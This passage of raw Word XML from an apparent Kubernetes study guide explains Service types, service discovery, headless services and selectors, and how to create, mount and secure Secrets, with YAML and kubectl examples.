          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35867B3D" w14:textId="14303D66"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ummary of Key Kubernetes Concepts</w:t>
      </w:r>
      <w:r w:rsidR="00BB108D" w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332A98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Master Node (Control Plane)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages the cluster's state, scheduling, and API interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F709F"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w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs containers in pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B05AE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The entry point for all Kubernetes interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C4A4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Determines where pods are placed on nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA510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Stores the configuration data for Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6314B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Ensures containers run properly on the nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F946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Manages networking and load balancing for services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C923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C6C4C">
          <v:rect id="_x0000_i3672" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2830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architecture provides a highly scalable, reliable, and maintainable environment for running containerized applications in production. Let me know if you need further details on any component!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EF238" w14:textId="445AC93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673" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B754F5" w14:textId="77777777"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06" w:name="_Toc197868120"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kubernetes Services?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="906"/>
    </w:p>
    <w:p w14:paraId="75739789" w14:textId="5559EBC0" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E89616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a </w:t>
      </w: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xml:space="preserve"> is an abstraction that defines a set of pods and a policy for accessing them. It provides stable networking and ensures that the user or another pod can access the application running in the pods. Services </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>decouple the clients from the pods by providing a consistent network endpoint, even as pods may be dynamically created, destroyed, or moved between nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A5E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help to manage and expose your application in a reliable way across your entire cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB277E"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54551">
          <v:rect id="_x0000_i3674" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6D1D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rvices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DAA8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Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3F36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Provides internal access to services within the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE9C7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service is accessible only within the cluster. Pods in the same cluster can communicate with the service, but it is not accessible from outside the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486B6A9"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Suitable for internal applications or microservices that need to communicate internally but do not require external access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A5B6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 If you have a database or an internal API service, you can expose it as a ClusterIP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131F28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432438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754FF4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2D36A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clusterip-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539CBFD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F77D11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729CB46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0C26A0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3D6969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0FEF020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5F2D3BE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655FEEB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  # Optional: can set to None for headless service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55247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p>
    <w:p w14:paraId="5963CD9A"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on a static port on each node’s IP address, making it accessible from outside the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D382E1"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xml:space="preserve"> service forwards traffic from an external port (on the node) to the internal port (on the pod) and is accessible externally via &lt;NodeIP&gt;:&lt;NodePort&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150EE32"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when you need external access but do not have an external load balancer. However, this is often not recommended for production as it's not a scalable solution for large clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEC2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6F0FC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A8193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67F7BB2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5D39B8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nodeport-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202C4D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F463F6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44FC11D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1545257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18BB478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3B5000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1D0016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13D206D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odePort: 30001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C16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NodePort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5995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ith this service, you can access it externally using &lt;NodeIP&gt;:30001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395B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p>
    <w:p w14:paraId="1077373B"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externally using a cloud provider’s load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E9918"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xml:space="preserve"> service creates an external load balancer that routes traffic to the service and exposes it outside the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193F7B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This type is often used in production environments, especially when running on cloud providers like AWS, GCP, or Azure, where cloud load balancers are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492D5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02623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226A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F10ECC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75945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name: my-loadbalancer-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF131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6EC2FD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5DF37CA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61020C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2698125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3303C6C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2EE9FB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0771B8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LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1ABE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will provision a cloud provider's load balancer and map it to the service. After it's provisioned, the external IP can be used to access the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB82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p>
    <w:p w14:paraId="35EBBF9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Maps a service to an external DNS name. It doesn’t create a proxy or forward traffic like other service types. It just returns the external DNS name for the requested service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302300D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This is used when you want Kubernetes to refer to an external service that is outside of the Kubernetes cluster but still managed within the system as if it were a part of the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E510C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Can be used for linking services like databases or APIs outside of Kubernetes (e.g., a database hosted outside the Kubernetes cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C16AB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E2914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8F2271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CD248F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A45FA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external-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACD69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6B1527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ExternalName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5A9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xternalName: external.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341C50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hen you try to access my-external-service from within the cluster, Kubernetes will route traffic to external.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D302CD4"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10828">
          <v:rect id="_x0000_i3675" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C349CF4"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 Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976119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Kubernetes services allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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service my-service in the default namespace, its DNS name would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F091F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y-service.default.svc.cluster.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F46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use this DNS name in your application configuration to access other services within the cluster, making service discovery easy and seamless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117E106"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2D2E1">
          <v:rect id="_x0000_i3676" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C206C3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eadless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E5177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headless service</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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for stateful applications (e.g., databases, caches) where you need to control the communication between pods directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4675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a headless service, you set the clusterIP to None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078DD00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6713D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1507B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798826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headless-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CFCCC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5EEF2DC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC1C7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39BB2C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727529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0A97545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A8AD13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6A88F56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targetPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A989B"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0CE3E">
          <v:rect id="_x0000_i3677" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD2A48"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ervice Selectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BD9E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service selector</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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label app: myapp on your pods, you can use this label in the service selector to route traffic to these pods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431CCB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58680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40D3A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A8BF20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lternatively, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>label selectors</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to match multiple labels or even exclude certain labels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D03F2C"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D4E576">
          <v:rect id="_x0000_i3678" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11144BE9"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52B0E3B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Internal communication within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347739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Exposes the service on a static port for external access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A570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Provides external access with a cloud provider's load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A56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r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maps a service to an external DNS name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB46E8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679" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA18C8" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF7CA0" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C6863" w14:textId="586A9C3F"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907" w:name="_Toc197868121"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kubernetes Secret?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="907"/>
    </w:p>
    <w:p w14:paraId="276211E0" w14:textId="676AE866" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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crets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854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w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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crets are used to securely manage sensitive information and allow you to grant access to that information within your Kubernetes cluster in a controlled manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53053734"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Why Use Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23A1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curity</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Secrets ensure that sensitive data is not stored directly in pod specifications, environment variables, or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401371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provides built-in mechanisms for controlling who can access specific secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC30C0"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ase of Use</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Secrets allow you to inject sensitive data into your pods in a way that’s easy to manage, update, and rotate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6E7BB"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ow Kubernetes Secrets Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84AA5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e64 Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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reating Kubernetes Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E39A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create secrets in Kubernetes using several methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C073D9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kubectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1EBD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literal values</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C50B2B3"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literal=password=supersecret123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE46DF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file</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AAC9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ssh-privatekey=path/to/private.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9AED6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directory</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914647"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path/to/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41F9C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a YAML file</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define a secret using a YAML file, and then apply it with kubectl apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118BF1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 YAML (secret.yaml)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6756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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D7BF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cret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339469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0755C78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00D35FA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ype: Opaque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48086D1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D0D4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username: bXlVc2VybmFtZQ==  # base64 encoded value of 'myUsername'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550241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assword: c3VwZXJzZWNyZXQ=  # base64 encoded value of 'supersecret'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52851E7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the secret from the YAML file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE267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apply -f secret.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646E418"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crets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A95B6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Opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default): General-purpose secrets that store arbitrary data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423C9A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ocker-registry</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to store Docker registry credentials, used by Kubernetes for pulling images from private Docker registries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC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ic-auth</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains credentials for basic HTTP authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71576C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sh-auth</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores SSH keys for SSH authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F45306"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Accessing Secrets in Pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521F37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expose secrets to your pods in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285A70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vironment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can inject secrets as environment variables into the containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C654AA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4EDA85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6C6094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501BE31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8E4415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7ACCD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4B43490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F54B1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1F1881E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nv:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C80D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_USERNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E269C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alueFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8AE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KeyRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0AA9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245E3C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key: username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E32919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Volume Mounts</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can mount secrets as files inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05084A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2A0C2E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3051938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4968E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EF6A4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6FF1F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74794F5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CE6BBC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6ABF0AE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Mounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12F82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78C6794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mountPath: "/etc/secrets"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128ABA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readOnly: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F264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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C333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32C541A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5475B0B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Name: my-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420923AA"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Best Practices for Using Secrets in Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9F9A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cryption at Rest</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enable encryption at rest for secrets in your Kubernetes cluster to ensure that the data is protected when stored in etcd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADBBE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east Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use RBAC (Role-Based Access Control) to restrict access to secrets to only the pods or users who require it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2758B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Use External Secret Management</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consider integrating with external secret management solutions (e.g., HashiCorp Vault, AWS Secrets Manager) for enhanced security and auditing features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F832AC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void Hardcoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Do not hardcode secrets in the application code or configuration files. Instead, manage them securely via Kubernetes Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C633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otate Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Regularly rotate secrets and update them in your cluster to minimize security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74470FD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65389E2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crets provide a secure mechanism for managing sensitive data in your Kubernetes applications. By decoupling sensitive information from the application code and using Kubernetes' buil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680" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C2C7A" w14:textId="0E18BF77" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="00BF7CA0">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3493126" w14:textId="4E26D9F1" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
